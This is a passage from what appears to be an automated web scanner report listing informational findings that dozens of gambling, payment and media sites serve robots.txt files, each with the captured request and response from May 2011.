Set-Cookie: winnings[vid]=540937; expires=Tue, 15-May-2012 12:34:07 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:34:07 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.65. http://twitter.com/ukscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ukscratch

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:45 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305547125266935; path=/; expires=Mon, 23-May-11 11:58:45 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 11:58:45 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

23.66. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.67. http://video.google.com/googleplayer.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /googleplayer.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Fri, 13 May 2011 20:19:57 GMT
Expires: Sat, 12 May 2012 20:19:57 GMT
X-Content-Type-Options: nosniff
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 00:14:39 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 231342

User-agent: *
Allow: /?cat=
Disallow: /?
Disallow: /docinfo
Disallow: /playrelated
Disallow: /related
Disallow: /stats
Allow: /support
Disallow: /s
Disallow: /timedtext
Disallow: /url
Allow: /videopla
...[SNIP]...

23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://winnings.com
Path:   /wp-content/plugins/google-analyticator/external-tracking.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=fl74nibuu7n9eu3bjccm899fl4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103122744; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540139; expires=Tue, 15-May-2012 11:41:25 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:25 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://winter.metacafe.com
Path:   /Openx/www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: winter.metacafe.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Set-Cookie: PHPSESSID=5736a6d5410233f5464ea3599c64b67e; path=/; domain=.metacafe.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22bfd41e469929c8e3ea84da694e238c09%22%2C%22LEID%22%3A39%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Sat, 14-May-2016 12:49:31 GMT; path=/; domain=.metacafe.com
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Keep-Alive: timeout=2, max=20
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

23.70. http://www.adobe.com/go/getflashplayer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /go/getflashplayer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 13 May 2011 19:57:27 GMT
ETag: "555-b71057c0"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Mon, 16 May 2011 06:54:55 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/plain
Connection: close
Date: Mon, 16 May 2011 12:12:43 GMT
Age: 560
Content-Length: 1365

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

23.71. http://www.apple.com/qtactivex/qtplugin.cab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /qtactivex/qtplugin.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
ETag: "41-3241c557be880"
Server: Apache/2.2.14 (Unix)
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
nnCoection: close
X-Cache-TTL: 600
X-Cached-Time: Wed, 04 Aug 2010 21:30:00 GMT
Content-Type: text/plain; charset=utf-8
Cteonnt-length: 65
Cache-Control: max-age=139
Expires: Mon, 16 May 2011 12:27:26 GMT
Date: Mon, 16 May 2011 12:25:07 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:


23.72. https://www.aspireaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aspireaffiliates.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: https://www.aspireaffiliates.com/sitemap.xml.gz

23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.betsson.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 14:10:58 GMT
Accept-Ranges: bytes
ETag: "0c5cf114085c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:36 GMT
Connection: close
Content-Length: 120
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/

User-agent: *
Disallow:
User-Agent: Googlebot
Disallow: /xml/sportsbook/
Sitemap: http://www.betsson.com/sitemap.xml

23.74. http://www.clickandbuy.com/WW_en/payment/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickandbuy.com
Path:   /WW_en/payment/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickandbuy.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:00 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 09:26:08 GMT
ETag: "c81afc-17-4a3613ed2cc00"
Accept-Ranges: bytes
Content-Length: 23
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Allow: /

23.75. http://www.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crazyscratch.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 11:15:08 GMT
Accept-Ranges: bytes
ETag: "72b5cbec1d8cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:28 GMT
Connection: close
Content-Length: 243

User-agent: *
Disallow: /*.swf$
Disallow: /*.aspx$
Disallow: /*.as$
Disallow: /*js$
Disallow: /js/
Disallow: /services/
Disallow: /images/
Disallow: /chromemenu/
Disallow: /geoip/
Disallow:
...[SNIP]...

23.76. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.123.55
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.77. http://www.gambleaware.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gambleaware.co.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gambleaware.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Feb 2011 14:21:58 GMT
ETag: "1802ac0a-15b-49d5867066d80"
Accept-Ranges: bytes
Content-Length: 347
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /blocks
Disallow: /concrete
Disallow: /config
Disallow: /controllers
Disallow: /css
Disallow: /elements
Disallow: /helpers
Disallow: /jobs
Disallow: /js
Disallow: /lan
...[SNIP]...

23.78. http://www.gamblersanonymous.org.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamblersanonymous.org.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamblersanonymous.org.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:29 GMT
Server: Apache/2
Last-Modified: Fri, 18 Feb 2011 20:19:29 GMT
ETag: "8c0047-130-49c943b30f640"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

23.79. http://www.gamcare.org.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamcare.org.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamcare.org.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:01:55 GMT
Server: Apache
Last-Modified: Mon, 14 Jan 2008 17:13:02 GMT
ETag: "a6508a-34-c9dfc380"
Accept-Ranges: bytes
Content-Length: 52
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /forum/
Disallow: /cart.php

23.80. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 16 May 2011 11:39:41 GMT
Expires: Mon, 16 May 2011 11:39:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

23.81. http://www.heavenaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heavenaffiliates.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heavenaffiliates.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:34 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.heavenaffiliates.com/sitemap.xml.gz

23.82. https://www.interwetten.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interwetten.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 May 2011 11:00:24 GMT
Accept-Ranges: bytes
ETag: "0d4a6a0cafcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Connection: close
Date: Mon, 16 May 2011 11:43:22 GMT
Age: 113
Content-Length: 273

User-Agent: *
Disallow: /pt
Disallow: /es
Disallow: /es-MX
Disallow: /it
Disallow: /de-AT
Disallow: /de-DE
Disallow: /de-CH
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow:
...[SNIP]...

23.83. http://www.itechlabs.com.au/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itechlabs.com.au
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itechlabs.com.au

Response

HTTP/1.1 200 OK
Content-Length: 52
Content-Type: text/plain
Last-Modified: Wed, 20 Oct 2010 12:17:34 GMT
Accept-Ranges: bytes
ETag: "1216e3c65070cb1:47722"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:54 GMT
Connection: close

User-agent: *
Disallow: /CMS/
Disallow: /temp/


23.84. http://www.lga.org.mt/lga/content.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/content.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lga.org.mt

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 13:09:14 GMT
Accept-Ranges: bytes
ETag: "f02fc8fbc579cb1:1ea77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:46:26 GMT
Connection: close

User-agent: *
Disallow: /financemalta/
Allow: /

23.85. http://www.metacafe.com/fplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Date: Mon, 16 May 2011 12:25:15 GMT
Content-Length: 1146
Connection: close
Set-Cookie: PHPSESSID=96c66f0eebdcc7c99987b345a7c6e6b6; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2234efbe47313a7b7772f14e23e8ad0334%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B0%2C9%5D%2C%22ffilter%22%3Atrue%7D; expires=Sat, 14-May-2016 12:25:15 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3417313452.20480.0000; expires=Mon, 16-May-2011 13:25:15 GMT; path=/

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer.php
Disallow: /invi
...[SNIP]...

23.86. http://www.national-lottery.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.national-lottery.co.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.national-lottery.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:05 GMT
Server: national-lottery
Set-Cookie: CAMTRACK=10.250.3.21.1305547925464066; path=/
Last-Modified: Thu, 28 Jan 2010 16:21:24 GMT
ETag: "5d82f-a3-47e3be8fe6900"
Accept-Ranges: bytes
Content-Length: 163
Vary: Accept-Encoding
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" comment "ICRAonline EN v2.0" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Connection: close
Content-Type: text/plain

# robots.txt for http://www.national-lottery.co.uk

User-agent: *
Disallow: /player/account
Disallow: /player/user
Disallow: /player/geo
Disallow: /player/gaming

23.87. http://www.nedstat.com/terms.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nedstat.com
Path:   /terms.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nedstat.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Jul 2010 08:42:58 GMT
ETag: "106420-18f-48c6e9ac90880"
Accept-Ranges: bytes
Content-Length: 399
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /integration-test/
Disallow: /kampyle/
Disallow: /language/
Dis
...[SNIP]...

23.88. https://www.neogamespartners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.neogamespartners.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:47:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: https://www.neogamespartners.com/sitemap.xml.gz

23.89. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opensource.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Last-Modified: Fri, 17 Dec 2010 13:48:34 GMT
ETag: "21a0287-624-4979b6d297080"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Mon, 30 May 2011 12:45:18 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

23.90. http://www.paysafecard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paysafecard.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.paysafecard.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:04 GMT
Last-Modified: Mon, 20 Dec 2010 11:46:44 GMT
ETag: "ac4008-1b0-12f9d100"
Accept-Ranges: bytes
Content-Length: 432
Keep-Alive: timeout=15, max=88
Connection: close
Content-Type: text/plain
Set-Cookie: TSdab043=d037dfa1cea7a1c108647b025aa2dda57dc7d9e2ca973e684dd11944; Path=/

User-Agent: *

Disallow: /cgi-bin/
Disallow: /fileadmin/
Disallow: /*.XML
Disallow: /intranet/
Disallow: /index.php?id=710
Disallow: /index.php?id=728
Disallow: /index.php?id=721
Disallow: /index.php?
...[SNIP]...

23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Last-Modified: Tue, 07 Dec 2010 09:22:17 GMT
ETag: "fbd4-131-496ce8a720440"
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /upload/
Disallow: /upload_mm/
Disallow: /static/npluk/
Disallow: /PersonalisationTest.htm
Disallow: /TestSalesMetCampaignCode.htm
Disallow: /DrawResults/RecentWinners/Go
...[SNIP]...

23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /PlayNOW/OrderYourTickets.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postcodelottery.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8h DAV/2
Last-Modified: Tue, 07 Dec 2010 09:22:17 GMT
ETag: "14886-131-496ce8a720440"
Accept-Ranges: bytes
Content-Length: 305
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /upload/
Disallow: /upload_mm/
Disallow: /static/npluk/
Disallow: /PersonalisationTest.htm
Disallow: /TestSalesMetCampaignCode.htm
Disallow: /DrawResults/RecentWinners/Go
...[SNIP]...

23.93. http://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thawte.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thawte.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:06 GMT
Server: Apache
Set-Cookie: v1st=E3E8AFCA7D29B0B7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Last-Modified: Tue, 01 Feb 2011 13:50:52 GMT
ETag: "293006d-d6-49b38d2166700"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/templates/
Disallow: /ssl/extended-validation-ssl-certificates/microsoft-hosting-gallery/index.html
Disallow: /ssl/web-server-ssl-certificates/microsoft-hosting-gall
...[SNIP]...

23.94. https://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thawte.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:54 GMT
Server: Apache
Set-Cookie: v1st=402EA0DF177407D6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Last-Modified: Tue, 01 Feb 2011 13:50:52 GMT
ETag: "27000b6-d6-49b38d2166700"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/templates/
Disallow: /ssl/extended-validation-ssl-certificates/microsoft-hosting-gallery/index.html
Disallow: /ssl/web-server-ssl-certificates/microsoft-hosting-gall
...[SNIP]...

23.95. http://www.trustlogo.com/ttb_searcher/trustlogo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustlogo.com
Path:   /ttb_searcher/trustlogo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustlogo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:59 GMT
Content-Type: text/plain
Content-Length: 161
Last-Modified: Tue, 29 Jun 2010 20:34:03 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /images/
Disallow: /javascript/
Disallow: /certs/
Disallow: /css/
Disallow: /trustlogo/

User-agent: TurnitinBot
Disallow: /


23.96. http://www.tstglobal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tstglobal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tstglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 09 Sep 2010 22:58:30 GMT
ETag: "ea90e5-46-48fdb91965180"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.tstglobal.com/sitemap.xml

23.97. http://www.ukash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ukash.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ukash.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/plain
Last-Modified: Fri, 01 May 2009 09:17:16 GMT
Accept-Ranges: bytes
ETag: "d3e4329f3dcac91:d3c2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:28 GMT
Connection: close

User-Agent: *
Disallow: /tent/
Disallow: /tent/cms.aspx
Disallow: /ukashPrivateLogos.html
Disallow: /uk/en/ukash-adult.aspx
Disallow: /uk/en/ukash-adult
Disallow: /uk/en/adult
Disallow: /uk/en/
...[SNIP]...

23.98. http://www.verisign.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verisign.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=889CE7A344F6A3C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Wed, 19 Jan 2011 20:38:22 GMT
ETag: "2320001-5a-49a38ff7beb80"
Accept-Ranges: bytes
Content-Length: 90
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /dm/
Disallow: /images/
Disallow: /Unlinked_Pages/
Disallow: /dev/

23.99. http://www.vincite.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vincite.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vincite.net

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=uk1l0uorbl4fsjf8qi7git3b41; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[sessionId]=103122920; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540306; expires=Tue, 15-May-2012 12:02:34 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:34 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.100. http://www.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=mb0tfa4fuqcus8rlegc46fsg84; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[sessionId]=103122745; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540140; expires=Tue, 15-May-2012 11:41:25 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:25 GMT
Connection: close
